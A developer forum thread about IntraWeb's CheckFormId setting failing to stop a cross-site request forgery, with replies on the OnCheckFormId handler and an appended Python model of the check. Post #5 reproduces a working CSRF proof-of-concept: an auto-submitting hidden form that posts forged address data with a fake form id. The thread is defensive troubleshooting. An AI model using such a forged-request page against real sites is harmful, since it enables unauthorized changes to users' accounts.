CheckFormId not working
#1
I am still using IntraWeb 14.2.3 and have an ISAPI dll running in IIS.  We have the CheckFormId property in ServerController set to true, however it does not seem to be working.  We failed a penetration test because an HTML page opened in another browser tab was able to update a form within my ISAPI application while passing an invalid value for the IW_FormID_.  It is our understanding that this property is supposed to check that IW_FormID_ value and it must match in order to process successfully.  Can anyone help me or confirm whether this is a known bug?  If so and it was fixed in a newer version can you please provide the version number?  Thanks in advance.
#2
According to your response I can assume that the generated fake request was a POST request and everything else was OK, except field IW_FormID_, correct?

Have you tried to recreate the issue and debug IWForm's event OnCheckFormId? Does it trigger?
#3
Alexandre Machado Wrote: According to your response I can assume that the generated fake request was a POST request and everything else was OK, except field IW_FormID_, correct?

Have you tried to recreate the issue and debug IWForm's event OnCheckFormId? Does it trigger?

Yes it was a POST request.  I did debug it locally and the OnCheckFormId does NOT trigger!  Please advise.
#4
I'll test it and let you know, although I don't have any details of your application....
#5
Alexandre Machado Wrote: I'll test it and let you know, although I don't have any details of your application....

The following is taken from the html page that successfully "attacked" my application.  Notice the FormID is a made up value (abc123).  When this page was loaded in another tab in the browser while my application was running it successfully updated the page in my application.  I look forward to your test results.  Thank you.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form name="csrf_request" action="https://www.website.com/ISAPI.dll/$/" method="POST">
<input type="hidden" name="TXTADDR1" value="456 Fake St" />
<input type="hidden" name="TXTADDR2" value="" />
<input type="hidden" name="TXTADDR3" value="" />
<input type="hidden" name="TXTCITY" value="Anytown" />
<input type="hidden" name="TXTZIPCODE" value="53221" />
<input type="hidden" name="CBXFOREIGNADDR_CHECKBOX" value="off" />
<input type="hidden" name="TXTCOUNTRY" value="" />
<input type="hidden" name="TXTSTATE" value="WI" />
<input type="hidden" name="TXTBEGINDATE" value="12/27/2019" />
<input type="hidden" name="TXTENDDATE" value="12/28/2019" />
<input type="hidden" name="CMBLETTERDELIVERY" value="3" />
<input type="hidden" name="TXTFAX" value="" />
<input type="hidden" name="TXTEMAIL" value="" />
<input type="hidden" name="TXTASF" value="" />
<input type="hidden" name="BTTNASFCHANGE" value="" />
<input type="hidden" name="CMDUPDATE" value="" />
<input type="hidden" name="CMDCANCEL" value="" />
<input type="hidden" name="CMDELECTRONICDELIVERY" value="" />
<input type="hidden" name="CMDADDRESSUPDATE" value="" />
<input type="hidden" name="IW_FormName" value="frmTempAddrUpdate" />
<input type="hidden" name="IW_FormClass" value="TfrmTempAddrUpdate" />
<input type="hidden" name="IW_FormID_" value="abc123" />
<input type="hidden" name="IW_width" value="781" />
<input type="hidden" name="IW_height" value="739" />
<input type="hidden" name="IW_Action" value="CMDUPDATE" />
<input type="hidden" name="IW_ActionParam" value="" />
</form>
<script>csrf_request.submit()</script>
</body>
</html>
#6
rchristi12 Wrote: Any update?  If there are specific details that I did not already provide in the thread that you need please let me know.  Thanks.
#7
Do you have an OnCheckFormId assigned? If not, please assign an event like this:

procedure TIWForm1.IWAppFormCheckFormId(Sender: TObject; var Allow: Boolean);
begin
  Allow := False;
end;

I tested here and it works as expected.
#8
I currently have the CheckFormId value in ServerController set to true. In my form I have the OnCheckForm assigned and set Allow = false as you instructed. It is hitting this code and now I receive an error "Invalid form Id" every time I try to do something on that form. It doesn't matter whether I try a CSRF attack with a different form id or simply try to use the form as it was intended which would use the existing form ID value. It always throws that error if I set allow = false and as a result I'm stuck on that form. Is there something else I am missing? Do you have a demo I can download and compare to? Thanks.
#9
So it is working, right?

The parameter "Allow" already comes with the check result. Meaning,

Inside the OnCheckFormId event, if Allow is False, it means that the received ID is not correct. You can still change it to True and allow it to execute if you want to. I recommend you to log it, though, and block. That's what most users do.

Whatever you do, you must assign an OnCheckFormId event handler so it will block execution for that particular form.

procedure TIWForm1.IWAppFormCheckFormId(Sender: TObject; var Allow: Boolean);
begin
  if not Allow then
  begin
    Log('execution was blocked');
  end;
end;
#10
No it's not working.  It appears to ALWAYS throw an error if we set allow = false even when the form ID values are the same.  By setting it to false is that telling IntraWeb to throw an error if the form ID values don't match or do we need to manually check these values somehow in this function?  This is not clear to me.
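The behaviour described in #9 and observed in #8 and #10, as an added model (not IntraWeb's code and not from any poster): the framework compares the submitted IW_FormID_ with the id it issued, hands the result to the handler as Allow, and rejects the post with "Invalid form Id" when Allow is still False afterwards. A handler that logs and leaves Allow alone blocks only the forged post; a handler that unconditionally sets Allow to False blocks legitimate posts too. The FormSession class, handler names and log messages are assumptions for the model.

```python
import hmac
import logging
import secrets
from typing import Callable, Dict

log = logging.getLogger("formid")
Handler = Callable[[bool], bool]  # receives the check result, returns final Allow


class InvalidFormId(Exception):
    """Models the 'Invalid form Id' error the poster in #8 sees."""


class FormSession:
    """Server-side state for one form: the id the server emitted as IW_FormID_."""

    def __init__(self) -> None:
        self.form_id = secrets.token_hex(16)  # unguessable, page-specific id

    def render_hidden_fields(self) -> Dict[str, str]:
        return {"IW_FormID_": self.form_id}  # what the legitimate page carries

    def process_post(self, fields: Dict[str, str], handler: Handler) -> str:
        submitted = fields.get("IW_FormID_", "")
        allow = hmac.compare_digest(submitted, self.form_id)  # framework check
        allow = handler(allow)  # handler may inspect or override the result
        if not allow:
            raise InvalidFormId("Invalid form Id")
        return "updated TXTADDR1 to " + fields.get("TXTADDR1", "")


def log_and_block(allow: bool) -> bool:
    """Recommended shape from #9: log a failed check, keep the framework's verdict."""
    if not allow:
        log.warning("execution was blocked: IW_FormID_ mismatch")
    return allow


def always_block(allow: bool) -> bool:
    """Shape from #7: unconditional Allow := False, which also rejects valid posts."""
    return False


def demo() -> Dict[str, str]:
    """Run a legitimate and a forged post (constructed, id 'abc123' as in the thread)."""
    sess = FormSession()
    legit = {**sess.render_hidden_fields(), "TXTADDR1": "456 Fake St"}
    forged = {**legit, "IW_FormID_": "abc123"}  # constructed forged post
    results: Dict[str, str] = {}
    for hname, handler in (("log_and_block", log_and_block), ("always_block", always_block)):
        for label, post in (("legit", legit), ("forged", forged)):
            try:
                sess.process_post(post, handler)
                results[f"{hname}/{label}"] = "accepted"
            except InvalidFormId:
                results[f"{hname}/{label}"] = "blocked"
    return results
```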